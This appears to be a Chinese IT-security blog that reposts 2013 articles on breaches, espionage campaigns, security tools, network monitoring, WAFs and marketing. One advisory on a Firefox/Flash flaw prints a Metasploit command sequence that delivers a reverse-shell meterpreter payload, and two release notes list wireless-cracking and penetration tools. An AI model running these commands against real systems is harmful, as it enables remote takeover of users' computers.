報告強調,這類網路間諜與破壞行動恐讓「作戰美軍承受嚴峻後果」,包括美軍重要作戰通信鏈遭切斷,資訊訛誤恐誤導美軍任務、武器的表現不如預期,以及戰機、衛星或無人機墜毀等。石明凱說︰「若他們對THADD設計或PAC-3設計有更深入的認識,將增加其彈道飛彈突破我方或我盟邦飛彈防禦系統的可能性。」


轉載自《Yahoo新聞》

新一代IM的4項管理挑戰

新一代IM的4項管理挑戰

個人行動端所帶來的低成本即時通訊應用,對於中小企業深具吸引力,但新的管理挑戰不容忽視

新一代行動通訊App的低成本、即時性與分享性,改變了企業內部溝通的形式,尤其是IT預算有限的中小企業,因此能擁有過去難以實現的快速溝通機制,但是,這類從消費性需求形成的新一代IM,也為企業帶來新的管理挑戰。

過去企業擔心個人電腦上的即時通訊工具成為洩密管道,或是惡意程式感染途徑,重視資安風險的企業會選擇全面禁止,或是有條件開放,甚至導入安全性較高的企業即時通訊服務,或自行開發內部即時通訊工具。在BYOD已成常態的現代,企業又該如何面對這些新一代即時通訊工具帶來的影響?

挑戰1- 免費行動通訊服務安全管控機制不足
使用免費的個人即時通訊App是否安全?這是企業會擔心的地方。畢竟這些免費個人即時通訊工具,不像企業即時通訊系統通常部署在企業自己的伺服器上,在安全管控與資料保存上比較容易。

不過,從近年新推出即時通訊工具來看,像是Line、微信、Cubie與M+ Messenger等即時通訊與Skype一樣,都有採用加密技術,這也成為新即時通訊工具的趨勢,不像過去Windows Live Messenger與YahooMessenger採明碼的方式傳送。

只是這些免費即時通訊服務,在管控機制上所提供的功能不足,企業無法設定權限、加密、過濾等管控機制。若以不同角度來看,甚至有企業因為政治因素,顧慮中國開發的免費工具是否不夠安全。

一般而言,每種溝通工具都有各自的定位,企業機密、重要資料通常都會藉由Email、線上會議系統,或是在面對面的會議上進行。重要的會議討論,一般不建議透過即時通訊平臺傳遞,通常反而是用在約定開會、碰面時間,較適合較無機密考量的對話與討論。

挑戰2- 私人通訊帳號難以集中管控 
從目前企業使用經驗所遇到的問題來看,這些新IM的特性是以使用者個人電話號碼來註冊,IM業者也多半不對外提供後端的集中管控系統,以避免侵害用戶隱私。

所以,這些個人即時通訊工具的好友清單並無法集中管控、備份,雖然電信商有提供備份電話簿的服務,但若是使用者換手機、手機遺失,後續動作都需要使用者自行處理,而不像企業即時通訊系統可以與企業內部帳號結合,管控設定容易。

當然,這些新IM工具也無法像企業即時通訊工具一樣,可以提供完善的對話記錄與Log紀錄保存,這些新即時通訊工具的訊息保存時間並不夠透明,備份後多是純文字檔,並由個人保管,易遭修改,證據保存效力弱。

挑戰3- 需搭配整體BYOD管理才能有效管控
這些行動通訊App畢竟屬於免費的個人端工具,與企業即時通運工具有一些根本上的差異。舉例來說,將個人即時通訊工具應用在工作上的使用型態,已經是將個人生活與工作放在一起,可能包含個人的朋友、家人與同事,而不像企業即時通訊工具只有企業內部工作的聯絡人為主。

若要對這些新IM工具加以管控,管控勢必需要制定更全面的BYOD的管理政策,以管控智慧型手機上的App使用。像是禁止員工使用智慧型手機,在手機安裝行動裝置管控軟體,或是企業提供給員工的行動裝置。因為,如果企業沒有制定管控標準與配套,每個員工也可能會以自己的方式BYOD。

企業必須在資安風險與通訊便捷上取得平衡,最好當然是能夠做到兩者兼顧。而現在的企業員工,已經習慣帶自己的裝置上班,如果需要改變這樣的習慣,勢必在短時間內會對企業造成不小的衝擊與反彈。

挑戰4- 新一代IM側錄困難
另一方面,傳統桌面端即時通訊工具也發生了一些變化,像是今年4月MSN用戶將轉移到Skype,而Skype不像MSN那樣容易監控,一些企業施行有限制的開放政策,也很擔心是否形成資安漏洞。

面對這樣的需求,企業或許會選擇網路記錄這類安全防護性產品,可在員工電腦上加裝監控外掛程式,以側錄Skype文字,甚至有些產品可以記錄傳檔內容、語音,提供事後稽核的電子記錄供舉證之用。但要注意的是,事前告知與稽核權限的規畫也要能同時做好。

只是這樣的作法,要套用在新即時通訊工具上,有一定的難度,現在即使是MDM產品也無法側錄Line等App的通訊。並且,如果使用者指只利用手機、透過3G網路,執行QQ、Skype等通訊工具,也難以管控。

另外,像是病毒與駭客入侵,或是有人發送詐騙連結、要求提供個資,也都可能是企業要面對的問題。

企業通訊工具也有提供行動通訊App
從企業通訊工具來看,現在提供整合通訊解決方案的廠商,也早已提供行動通訊App,這些App功能多強調語音、視訊,以及語音留言或文字,讓內部環境溝通更便利,但這樣的應用只是整合通訊的一小部分功能。

整合通訊強調安全性、穩定性與擴展性,面向大致涵蓋桌面通訊、行動通訊、語音溝通、視訊溝通,以及協同作業能力。

像是Alcatel-Lucent、Avaya、Cisco、IBM、微軟、NEC、Polycom等企業即時通訊產品,他們的特點是都能與企業內部帳號結合,並能夠建置在企業伺服器上,只是硬體設備廠商較偏重與不同視訊會議終端設備、話機設備的連線。軟體廠商重視與電子郵件軟體、協同作業平臺整合。

轉載自《iThome》

2013年社群媒體行銷產業報告


2013年社群媒體行銷產業報告

2013年社群媒體行銷產業報告

為了更瞭解行銷業者如何使用社群媒體來拓展商務,Social Media Examiner 調查了3,000位行銷業者,得出了最新的“2013年社群媒體行銷產業報告” (2013 Social Media Marketing Industry Report),內容包括:

※最多行銷業者希望獲得解答的社群媒體問題
※行銷業者投放在社群媒體作業上的時間
※社群媒體行銷的最大益處,和投放時間對效果的影響
※最常用的社群媒體
※行銷業者未來會更加注重的社群平台

調查報告的結果可以總結為以下8點:

1. 多數的行銷業者(86%)都很重視社群媒體
2.  戰略和互動是最多行銷業者(88%)想掌握的面向
3.  在未來最多行銷業者(69%)打算要加強的平台是YouTube
4. 最多行銷業者(62%)希望更加瞭解如何掌握部落格的使用
5. 播客(podcast)的使用將會在2013年激增,只有5%的行銷者有在使用播客,而打算增加使用的人卻有24% (接近5倍)
6. Facebook 和 LinkedIn 對行銷業者是最重要的兩個社群網絡
7. 多數的行銷業者不確定他們的Facebook行銷是否有效,只有37%認為有效
8. 增加曝光是社群媒體行銷帶來的最大益處

下面讓我們一起看看報告的細節吧。(完整報告)

最多行銷業者希望獲得解答的社群媒體5個問題

有83%的受訪對象表示無法全部回答以下的問題:
●戰略:哪些社群戰略是最有效的
●互動:哪些方法可以在社群媒體上引發受眾的互動
●衡量:要如何衡量社群媒體的回報ROI?
●工具:有哪些最好的社群媒體管理工具?
●策略:要如何製定一個社群策略?

社群媒體行銷的使用現狀

基本概況:
●97%的受訪對象表示有運用社群媒體 (比對2012年的94%增加了3%)
●86%的行銷業者表示社群媒體對他們的事業很重要 (比對2012年的83%增加了3%)
●45%的行銷業者有兩年以上的社群媒體經驗

衡量社群媒體的成效:
衡量成效仍然是行銷業者的一大挑戰。

●只有26%的人自認有能力衡量他們的社群媒體經營狀況

Facebook行銷的有效性:
Facebook行銷的效用對於中小型企業仍然有待精進。

●只有32%的人認同Facebook行銷有成效,其中B2C行銷業者的認同率(44%)比B2B的高(29%)
●較大型的企業認為Facebook行銷有效的比例較高。例如,員工超過1,000名的企業中有46%認為Facebook行銷有效,相較於自僱式的企業只有29%

“行動裝置優化”部落格:
為部落格作行動裝置優化有待普及。

●只有28%的受訪對象表示他們的部落格有做行動裝置優化
●B2B的行銷者比較傾向會把其部落格作優化(31%),相較於B2C只有26%

社群媒體的整合:
多數行銷業者明白整合社群媒體的重要性。

●有79%的行銷者表示他們有把社群媒體和傳統的行銷作業作整合

每週投放在社群媒體的時間:
業者每週投放在社群媒體的時間有增加的趨勢。

●62%的行銷業者每週投放超過6小時在社群媒體上(比對2012年的59%)
●36%投放11小時(比對2012年的33%)
●接近17%的行銷者甚至投放超過20小時

使用經驗因素:
行銷者的使用經驗與他們每週的投放時間有直接關係。

●經驗少於12個月的人之中有50%每週花少於5小時在社群媒體上
●經驗超過2年的人之中則有70%每週花6小時

社群媒體帶來的好處:

●89%的業者表示他們在社群媒體上所作的努力為企業產生更多的曝光率
●75%-增加流量有正面的效果
●69%-獲取市場資訊
●65%-建立粉絲的忠誠度
●61%-產生潛在客戶
●58%-改善搜尋排名
●54%-培養商業合夥關係
●47%-降低行銷成本
●43%-增加銷售

增加銷售:
調查結果顯示,建立能帶動銷售的關係是需要時間的。很多有花功夫的行銷業者就有獲得好的成效:

●有超過3年社群媒體經驗的業者當中,50%的人表示社群媒體幫助到他們增加銷售
●每週投放11小時以上在社群上的業者當中,超過一半的人看到同樣的結果
●每週投放40小時以上在社群上的業者當中,有62%透過所作的努力獲得新客戶

最常用的社群媒體
Facebook、Twitter、LinkedIn、部落格、以及YouTube是最多行銷業者使用的平台。

●92%- Facebook
●80%-Twitter
●70%-LinkedIn
●58%-部落格
●56%-YouTube
●42%-Google+
●41%-Pinterest
●18%-圖片分享網站 (Instagram)
●16%-論壇
●11%-地理定位網站 (Foursquare)
●10%-社群書籤網站 (StumbleUpon)

行銷業者的社群媒體經驗與平台的使用關係:
當行銷業者使用社群媒體的經驗越多,他們的行銷作業就越擴展至多種社群平台。

●少於1年經驗-Facebook(86%)、Twitter(67%)、LinkedIn (66%)
●1-2年經驗-Facebook (93%)、Twitter (78%)、LinkedIn (68%)、部落格 (53%)、YouTube (51%)
●2-3年經驗-Facebook (95%)、Twitter (87%)、LinkedIn (68%)、YouTube (65%)、部落格 (60%)
●3-4年經驗-Facebook (96%)、Twitter (90%)、LinkedIn (73%)、YouTube (71%)、部落格 (70%)、Pinterest (52%)、Google+ (51%)
●4-5年經驗-Facebook (96%)、Twitter (93%)、LinkedIn (77%)、YouTube (73%)、部落格 (73%)、Google+ (54%)、Pinterest (53%)
●5-6年經驗-Facebook (96%)、Twitter (92%)、LinkedIn (92%)、部落格 (78%)、YouTube (73%)、Pinterest (63%)、Google+ (60%)、

最重要的單一社群媒體平台
如果要行銷業者只能選一個最重要的社群平台,他們的選擇結果是:

●49%-Facebook
●16%-LinkedIn
●14%-部落格
●12%-Twitter

行銷業者未來會更加注重的社群平台

●YouTube-69%
●Facebook-66%
●部落格-66%
●LinkedIn-65%
●Twitter-64%
●Google+-53%
●Pinterest-51%

轉載自《inbound journals》

2013年5月28日 星期二

破解無線網路加密的 Aircrack-NG 發佈 1.2 Beta 1 版

破解無線網路加密的 Aircrack-NG 發佈 1.2 Beta 1 版

Aircrack-ng是一個與802.11標準的無線網路分析有關的安全軟體,主要功能有:網路偵測,封包側錄,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持監聽模式的無線網卡上並側錄 802.11a,802.11b,802.11g 的無線網路封包。
可運行在 Linux 和 Windows 的環境上。

參考資料:
維基百科:http://zh.wikipedia.org/wiki/Aircrack-NG
官方網站:http://www.aircrack-ng.org/

更新項目:
1.Compilation fixes on all supported OSes.
2.Makefile improvement and fixes.
3.A lot of fixes and improvements on all tools and documentation.
F4.ixed licensing issues.
5.Added a few new tools and scripts (including distributed cracking tool).
6.Fixed endianness and QoS issues.

下載處:
http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz

註1:Aircrack-NG 在許多安全檢測光碟(例如:BackTrack、Kali Linux)套件中都有內建,如用套件請記得更新!
註2:影片為使用舊版的示範,提供給不知道這是個什麼靈異的鬼東西的人參考!


轉載自《網路攻防戰》

Groupon 台灣網站受到攻擊,會員密碼與電子郵件等資料遭竊

Groupon 台灣網站受到攻擊,會員密碼與電子郵件等資料遭竊

groupon_taiwan
台灣酷朋(即 Groupon 台灣)發表公開聲明,表示網站資料庫曾於 5 月 19 日遭受攻擊,已確定被竊取的資料為會員密碼及電子郵件;不過站方強調,由於系統不儲存會員的信用卡訊息、送貨地址、電話和收件人姓名,以上資料並未遭竊。

站方已對所有會員發出正式的通知函,並強調,本事件為發生在台灣的單一狀況,不影響其他地區的 Groupon。

以下為公開聲明全文:

台灣酷朋 公開聲明

5/19,台灣酷朋確認了一起網站資料庫攻擊事件,目前已確定被竊取的會員資料包括加密過的密碼(註)和電子郵件,所幸我們的系統中從未儲存過任何會員的信用卡訊息及送貨地址/電話/收件人姓名,所以遭竊取的資料中不包含任何會員的金融及生活相關資料。台灣酷朋已經針對所有的會員發出正式的通知函,除了於函內提供更新密碼的流程說明之外,客服單位也將自9:00~21:00提供設定說明的服務,七天無休。在5/30前未收到「個人資料維護通知函」的會員,即代表您的帳戶不在本次事件的被竊取名單中。Groupon美國總部安全技術單位已提供最高規格的安全措施支援,阻止自5/19起來自任何一方的入侵行為。本事件僅為發生在台灣地區的單一狀況,不影響也與其他地區的Groupon沒有任何關聯。台灣酷朋再次為本次意外事件所造成的不便及負面觀感,向我們所有的會員致上最深的歉意。
註:加密過的密碼意指以加密演算法保護過的密碼。為了維護資料安全性,台灣酷朋不會以「明碼」的方式來儲存密碼,當密碼被儲存到資料庫時,會經過加密處理變成亂碼,這樣即使被非帳戶擁有者看到,也無法輕易辨認實際密碼為何。

台灣酷朋
Groupon Taiwan
客服電話:(02) 2713-1485

後續報導:
台灣Groupon被駭,約38萬用戶帳密可能外洩

轉載自《INSIDE》

網路間諜活動盛行 全球100多國淪為Safe受害者

網路間諜活動盛行 全球100多國淪為Safe受害者

網路間諜活動盛行,企業機密資料岌岌可危,根據趨勢科技報告指出,自去(2012)年10月開始的Safe網路間諜行動,至今已有12000個IP位址受害,範圍涵蓋100多個國家,受害組織包括政府部門、科技公司、媒體、學術研究機構、非政府組織…等不同單位。

Safe行動採用魚叉式網路釣魚(spear phishing)手法,攻擊者會先寄出一封夾帶惡意附件的E-mail給攻擊目標,當受害者打開惡意附件、電腦就會自動下載惡意程式,並與遠端中繼站建立連線。

為了降低被發現的風險,攻擊者依據攻擊目標的不同,分別使用2個不同的C&C伺服器,此外,攻擊者還透過虛擬私人網路(VPN)和代理工具,讓網路服務供應商的IP位址的地理位置更多樣性。

在第一組攻擊行動中,攻擊者散布內容與西藏和蒙古相關的Email,並夾帶一個惡意word文件,該份惡意文件能利用微軟在2012年4月已經修補的Word漏洞,入侵使用者電腦。根據C&C伺服器存取記錄,共有來自11個國家的243個IP受害,不過在趨勢介入調查時,只剩下其中3個來自蒙古和蘇丹南部的IP仍然十分頻繁的進行存取。

第二組攻擊範圍更大,根據C&C伺服器存取記錄,受害者來自116個國家、共有11563組IP位址,不過實際受害者應該沒有這麼多,平均而言,每天約有71個IP位址與該C&C伺服器之間頻繁溝通,前五名受害國家分別為印度、美國、中國、巴基斯坦、菲律賓和俄羅斯。

攻擊者在Safe間諜活動中所使用的惡意程式,不僅專門為竊取資料而設計,同時還整合其他模組以增加功能,如:竊取IE和Firefox上儲存的密碼、竊取儲存在Windows上的遠端桌面協定(Remote Desktop Protocol,RDP)憑證…等,根據市場推斷,其開發者與中國地下網路犯罪集團有關,而且還使用了與中國某知名大學所做研究有關的技術,以及某一家中國網路服務業者的原始碼資料庫,雖然目前還無法確定攻擊者的意圖和身分,但種種跡象皆顯示與中國有關。

事實上,自今(2013)年以來,網路間諜活動頻傳,魚叉式網路釣魚更是駭客常用的攻擊手法,企業除了提升病毒防禦能力之外,也應該提醒所有員工在開啟信件和訊息時要格外留意是否為安全的來源,避免成為下一個受害者。

轉載自《資安人科技網》

2013年5月27日 星期一

BackBox Linux 發佈 3.05 版

BackBox Linux 發佈 3.05 版

BackBox Linux 是一個基於 Ubuntu 的環境所客製化的發行版本,主要用於檢測滲透測試的環境中。

更新項目:
1.System improvements
2.Upstream components
3.Bug corrections
4.Performance boost
5.Improved Update menu
6.Improved Wi-Fi drivers (compat-wireless v3.8 with Aircrack-NG patch)
7.Full support to Kernel 3.5 and 3.8 (install it with apt-get/synaptic)
8.Predisposition to ARM architecture (new armhf.iso coming soon)
9.New and updated hacking tools (automater, inundator, ettercap, wireshark, se-toolkit, metasploit, sqlmap, beef, recon-ng, zaproxy, weevely, thc-ipv6, truecrack, hashcat, etc.)

下載處:http://www.backbox.org/downloads

註:這類基於 Linux 某發行版本的安全檢測客製版其實相當的多,並且會發現其內所包含的套件列表大同小異,熟悉一套環境即可,畢竟檢測工具百百種,基本觀念是不會改變的。

其它知名檢測的發行版本:
BackTrack
Kali Linux
Backbuntu
OWASP Live CD
Attackvector
Santoku
Magicbox


轉載自《網路攻防戰》

Firefox 17.0.1 + Flash 的漏洞(含影片示範)

Firefox 17.0.1 + Flash 的漏洞(含影片示範)

發佈日期:2012/11/21(由 Marius Mlynski 首次發現)、2013/5/15(發佈PoC)
影響版本:Firefox 17.0.1 (含之前所有版本)
漏洞編號:
CVE-2013-0758
CVE-2013-0757

這個漏洞會使 Firefox 17.0.1 (含之前所有版本)觸發執行遠端惡意程式,而 Flash 是拿來當作觸發 Firefox 漏洞的媒介。
在官方網站標示為『Critical』嚴重等級的漏洞。

官方網站說明:
http://www.mozilla.org/security/announce/2013/mfsa2013-15.html

解決方案:
請更新 Firefox 到最新的版本

影片內指令:
use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

參考資料來源:
http://eromang.zataz.com/2013/05/27/firefox-17-0-1-flash-privileged-code-injection-metasploit-demo/


轉載自《網路攻防戰》

查修網路一目瞭然 用Weathermap強化Cacti

視覺化網路監控工具 架構圖上看設備狀態流量
查修網路一目瞭然 用Weathermap強化Cacti

本文將介紹Cacti的外掛程式Weathermap。運用Weathermap可以在同一個網頁內顯示網路架構圖以及設備的狀態和流量等相關資訊(前提是設備數量不要太多,畢竟設備太多就很難一目瞭然),讓管理者可以輕易地在短暫的時間內找出CPU負載過大、記憶體剩餘太少、Session數使用過多,或是流量異常上升的設備,以確實找出問題點。

在以下的篇幅,將介紹Weathermap的安裝及操作流程供讀者參考,以評估是否需要架設在現有的網路內。

安裝及設定Weathermap

Weathermap相關資訊及說明均存放在Cacti的網頁(http://docs.cacti.net/userplugin:weathermap)中,其下載頁面在「http://www.network-weathermap.com/download」。

Weathermap有兩種執行方式,一種是作為Cacti的Plugins執行,另一種是當作網頁程式單獨執行,這裡將示範以Plugins的方式執行。

首先,將檔案下載回來,存放至「/usr/src」目錄內。



筆者原先使用的Cacti為0.8.7g版(先前在Ubuntu 11.04以apt-get方式安裝),尚不支援Plugins,因此必須自行升級為0.8.8a版(或更新的版本)。

詳細的操作可以參考Cacti官方網頁(http://www.cacti.net/downloads/docs/html/upgrade.html)。以下是筆者的操作流程:

下載最新版的Cacti,解壓後安裝至「/var/www/cacti」目錄內,並將原先rra目錄中的rrd檔、scripts以及resource裡面的程式都複製到新的目錄內(如果尚未新增設備及新增script則無需進行此動作)。



請讀者自行尋找apache2相關設定檔,並修改其內容:



將Alias /cacti /usr/share/cacti/site及,修改為Alias /cacti /var/www/cacti及。

接著將Weathermap解壓縮,並移至Cacti的目錄,再修改目錄及檔案所屬群組:



最後重新開啟Apache,讓它讀入Cacti的新目錄設定:



再調整一下Cacti對於資料庫的相關設定:



將MySQL的部分配合自己的帳號和密碼進行修改,之後再重新開啟Cacti的網頁,它會發現這是一個升版動作,接著依它的指示依序執行即可。

在此須注意的是,Cacti是否有定時執行?記得檢查一下「/etc/cron.d/cacti」檔案裡的內容,並將目錄修改成Cacti升版後的所在目錄:



修改成




登入Cacti之後,可以在左下角找到Plugin Management的連結,這就代表已經成功更新了Cacti,並且可以使用外掛程式管理功能,如圖1所示。


▲圖1 Cacti更新後可執行外掛程式管理功能。

隨後點選Plugin Management,此時就可以看到Weathermap已經出現在Plugin的名單中,如圖2所示。在Action欄位內,可以看出它目前是處於非啟動狀態。點選該箭頭圖示,將其啟動。


▲圖2 Weathermap已出現在Plugin的名單內。

在點選箭頭圖示後,它會從原先的藍色向下變為紅色向上。此時,在Console選單的Management裡就可以看到Weathermaps的選項,將其點選,以進行細部的設定,如圖3所示。


▲圖3 選擇Console選單中的Weathermaps,以進行細部設定。

之後修改群組設定,按下〔edit groups〕按鈕,如圖4所示。


▲圖4 修改群組設定。

接著再點選「Rename」,將原先的Group Name修改為「The Great Network」,讀者請依自己的需求進行調整,如圖5所示。


▲圖5 修改群組名稱。

最後,開始編輯自己的地圖。同樣點選圖5中的「Weathermap Editor」。此時會有以下的說明:

The editor has not been enabled yet. You need to set ENABLED=true at the top of editor.php Before you do that, you should consider using FilesMatch (in Apache) or similar to limit who can access the editor. There is more information in the install guide section of the manual.

大意是說,需要在editor.php檔案中設定ENABLED=true,另外這個檔案會有安全性的疑慮,請設法保護它的安全。

筆者的伺服器僅對內網開放,因此不必特別加以保護,若讀者有此需求,可自行參閱Apache的網頁說明(http://httpd.apache.org/docs/2.2/mod/core.html#filesmatch)。

接著,利用指令「vi /var/www/cacti/plugins/weathermap/editor.php」編輯editor.php,並找到「$ENABLED=false;」這一行(筆者的檔案中是在第七行)。將$ENABLED=false;修改為$ENABLED=true;。

再點選一次圖5中「Weathermap Editor」,就會看到如圖6的頁面。在Create A New Map欄位內輸入「Office Network」,並按下右側的〔Create〕按鈕。


▲圖6 設定Map名稱。

然後,程式就會引導進入繪圖介面,如圖7所示。


▲圖7 Weathermap繪圖介面。

實際操作Weathermap:建立一個簡單的Map

在此實際操作Weathermap,並建立一個簡單Map的流程供讀者參考。

在此操作中,較常使用的是功能表介面,筆者放大如圖8所示(圖7的上半部分),以方便之後進行說明。


▲圖8 繪圖介面功能表。

Weathermap可以直接套用Cacti建立的各種圖形(這也是本文選擇作為Cacti的Plugin執行的最大原因)。因此在建立Map之前,必須先利用Cacti的介面來建立設備的相關圖形。

筆者事先建立了Cisco 2950 switch及Cisco 871 router的CPU使用率、記憶體使用量及流量使用量的圖形。讀者可至「http://forums.cacti.net/about15067.html」網頁中尋找自己設備適用的Template,以加速建立相關圖形的速度,詳細操作流程可參閱網管人第83期。

在此提醒一下讀者,若單純只是要將圖形藉由Weathermap帶出,那麼在建立圖形過程中建立Graph Trees的相關動作是不需要執行的。

繼續把Weathermap完成。先點選圖8中的「Add Node」,此時滑鼠的游標會變成十字形,接著在網頁白色部分(繪圖區,請參考圖7)上想要的位置加以點選,此時繪圖區會出現Node的圖形。

接著,使用滑鼠左鍵點選「Node」,並編輯成想要的名稱。在此只需修改Lable、’Hover’Graph URL及Icon Filename即可。


▲圖9 修改Node資訊。

將Node改為Router,並點選開啟Icon Filename的下拉式選單,選擇【images/Router.png】(此為內建的檔案,可自行上傳圖檔至「/var/www/cacti/plugins/weathermap/images/」),最後點選「Pick from Cacti」。

此時會出現之前建立的Cacti的Graph List,如圖10所示。可點選「Host」,以加速篩選速度,這裡直接點選「Router – CPU Usage」,最後按下〔Submit〕按鈕即可。


▲圖10 選擇適用的Graph List。

接著同樣新增一個Node,位置約莫在原先的Node下方,在Graph部分,選擇的是「Router – Memory Usage」,Label部分則輸入「Memory」。

如果位置不好調整的話,在建立過程中可修改Position的欄位調整其X軸及Y軸的值(圖9)。

也可以直接編輯設定檔,以此例而言,設定檔存放在「/var/www/cacti/plugins/weathermap/configs/」中,會有一個與自己設定的Map名稱相同的檔案。

將其開啟後,可以搜尋Label名稱,往下可以看到POSITION的欄位,之後就可以自行調整其X軸與Y軸的值。

依循相同的步驟,在Map上建立Switch的相關圖形。最後點選圖8中的「Add Link」,再依序點選先前建立的Router和Switch的圖形。Weathermap會自動在兩者之間建立兩個指向對方的箭頭。

接著點選這個Link,並依照自己的需求更新Maximum Bandwidth與Data Source的欄位,如圖11所示。


▲圖11 建立Link相關資訊。

Link的Data Source,一般是抓取兩部設備介接的介面的流量圖,以便看出是否有流量異常的情形發生。在選擇「Pick from Cacti」後,Info URL和’Hover’Graph URL欄位也會自動填寫完成。之後再點選右上角的〔Submit〕按鈕,基本的Map就完成了。

最後將此Map放到上面的Weathermap選單中。點選圖8最左邊的「Change File」,就可以回到Cacti的網頁。接著,同樣點選左邊選單的「Weathermap」,並點選右邊的「Add」,如圖12所示。


▲圖12 新增map至Weathermap。

接著出現的畫面如圖13所示,再點選Office Network最前方的「Add」,就完成了。


▲圖13 新增map至Weathermap(續)。

最後點選上方選單的Weathermap,就可以看到剛剛辛苦建立的Map。

此時,如果把滑鼠游標滑過圖形,就可以看到對應的Graph,例如滑鼠滑過Router,可以看到CPU Usage,滑過Router下方的Memory,將會顯示Memory Usage,滑過兩個設備間的Link,就能夠看到流量圖。

圖14所示便是滑鼠滑過Memory時的顯示情形。


▲圖14 Weathermap的輸出。

Link會顯示流量的使用率,在此例中上傳為0.01%,下載為0.0.1%。依不同的使用率區間,會有不同的顏色,管理者可以清楚得知是否某些Link有巨大的流量流經。

另外,在建立Link時,也可以設定當流量使用率到達某個門檻值時,產生對應的IN Comment和OUT Comment,以便於判斷。

結語 

在障礙查修時,太多的情報和太少的資訊,都會影響查修的速度。可以利用Weathermap簡潔的介面,在一個頁面內同時看出網路的架構和各種流量圖,它提供適量的資訊讓管理者可以輕易地判斷問題點,藉以提升查修的速度。如果原先就已經架設Cacti的管理者,不妨一併安裝Weathermap,利用此方便的工具讓自己的工作更輕鬆。

Weathermap能自訂的部分相當多,本文只是拋磚引玉引領各位讀者進行簡單的操作,讀者若有興趣的話,不妨自行鑽研,相信必定能挖掘出Weathermap更多的功能。

轉載自《網管人》

深化控管但簡化操作 WAF抵抗新型態攻擊行為


保護網頁應用程式不受駭
深化控管但簡化操作 WAF抵抗新型態攻擊行為

網頁應用程式可說是由外而內的攻擊管道之一,欲防範諸如SQL資料隱碼(SQL Injection)、跨網站指令碼(Cross-Site Scripting)等攻擊行為,大多會在網頁伺服器的前方建置WAF(Web Application Firewall,網頁應用程式防火牆)來抵擋。如今面對駭客組織化、商業化後,促使攻擊手法隨時都在進步,WAF更必須與時俱進,因應攻擊手法的變化,來進行辨識與攔阻。

判斷攔阻惡意存取

就基本可阻擋的攻擊型態來看,業界大多是參考對應OWASP(Open Web Application Security Project)組織公佈的十大資安威脅類型而設計,如今可說已是WAF設備最基本該具備的功能。F5台灣區技術經理林志斌指出,因此WAF現在發展較著重的是新型態攻擊的應變能力,例如DDoS(分散式阻斷服務),或是後端的網頁伺服器出現漏洞時,要有很快速的方法去應變,像是直接在設備上設定Policy,或利用內建於WAF平台的腳本語言如iRule來撰寫Script,就可以阻擋這些以往不曾出現過的攻擊,讓後端的應用程式得以持續提供服務。

WAF所解析的標的主要是都透過HTTP通訊協定傳輸的內容,也就是必須要懂得HTML、JavaScript、AJAX等語言,才能判斷欄位、字串等參數值,進而作管控,或判斷存取行為是否為惡意攻擊,但其實要區別正常與異常行為並不容易。

A10 Networks台灣區技術總監簡偉傑即舉例,有些企業會申請多條ADSL線路來加大頻寬,透過一台Multi-Link設備來做頻寬整合,認為既經濟又實惠,但連結出去所帶的IP位址,可能每次都不同。對提供服務的網頁伺服器而言,遠端進來的同一個用戶雖然HTTP的Session ID都一樣,但是卻有好幾個不同的來源IP位址;若網頁伺服器僅提供訊息發佈,還可選擇忽略IP位置的判斷,只要Session ID都一樣即屬於正常存取,不至於造成困擾,但同樣狀況若發生在訂票系統就不同了。 因為訂票系統網頁有提供金錢交易,自然要記錄使用者端的環境資訊,不僅要檢查來源IP的變化,甚至每項資訊都要經過比對檢查。但實際上若動輒判斷為異常,恐怕過於嚴謹,可能會接收到許多使用者的抱怨;相對地,若一律判斷為正常,又有可能是一波攻擊行為的前哨,會升高資安風險。諸如此類的模糊地帶,只是其中一個很小的細節,若皆能經由WAF來輔助作正確的判斷,才是導入此解決方案價值所在。

細緻控管網頁應用

近年來台灣對資安的關注升高,再加上法規效應,因此WAF可說日漸受到重視。就F5 BIG-IP Application Security Manager來看,若遇到新型態攻擊事件發生,會有的作法,除了透過本身內建的防禦機制直接抵擋,亦可進一步針對每一個對Web的Request塞入一個特徵碼,也就是運用Cookie的機制來作反向檢查確認,若取得用戶端的資訊沒有記錄操作相關內容,則多半為機器人程式發動的連線,即可判斷為異常,自動攔阻此存取行為,並且將記錄結合統計報表,讓管理者了解網路攻擊行為。


▲不同技術層應有其相對應防護機制。(資料來源:F5)

至於網頁伺服器連線到後端資料庫的資料傳遞,亦可藉由WAF從應用程式端進行防護,例如網頁執行程式中有一段SQL陳述式需連結到資料庫執行,通常此管道也是SQL Injection的入侵方式,一旦經過WAF立即可被辨識與阻擋。即使是正常的SQL Query行為,若資料庫所回應的資料缺乏保護機制,WAF亦可協助補強,例如針對敏感性較高的特定欄位與字串,以遮罩(Data Masking)的方式來處理。

其實WAF經過這幾年發展,控管可說更加細緻也較貼近企業應用環境,遮罩功能就是其一。常見實作的方式是在應用程式開發時就已加入此機制,但若是遇到更早期開發的程式碼,當初還沒有現在對資安的觀念,若因為要增加遮罩功能而修改程式碼,複雜度相當高,要做Code Review、修改、測試等一連串的開發程序,往往需要一段時間來進行,而這段空窗期間的防護機制,即可由WAF來擔綱。

畢竟在資安領域,產品往往只是一種工具,更重要的是能駕馭產品的技術人員,同時要懂得需求、邏輯,才能夠在企業實際應用環境中發揮作用。

轉載自《網管人》

讓更多粉絲分享Facebook貼文的14種方法


讓更多粉絲分享Facebook貼文的14種方法

讓更多粉絲分享facebook你的貼文:14種方法
如果你有認真經營你的粉絲專頁,每則貼文都很棒,你當然想有更多的人分享你的內容,讓他們的朋友也看到。有甚麼方法可以更有效地傳播你的信息呢?社群媒體專家Marie Smith提出了14種方法,可以讓更多的粉絲分享你的貼文,在此與你分享並供參考。

讓更多粉絲分享Facebook貼文的14種方法

1. 定時PO文

每週PO文五次,維持你在粉絲心目中的“第一印象” (top of mind) 知名度。
定時PO出貼文

2. 選對PO文時間

根據你的行業特質,定出你的最佳PO文時間。例如,餐飲業一般在7:00 am – 12:00 pm的互動最好;而零售業則在8:00 am – 2:00 pm 。
在對的時間PO出貼文

3. 使用吸引目光的圖片

交替使用圖片、影片及純文字動態消息。
使用吸引目光的圖片

4. 貼文盡量簡短

根據Facebook提供的資料,少於三行的文字貼文,獲得的“讚”、留言、及分享比較長的貼文多60%。
貼文要簡短

5. 貼文要切題

你的內容必須讓粉絲感到你瞭解他們。
貼文要切題

6. 用你真實的聲音

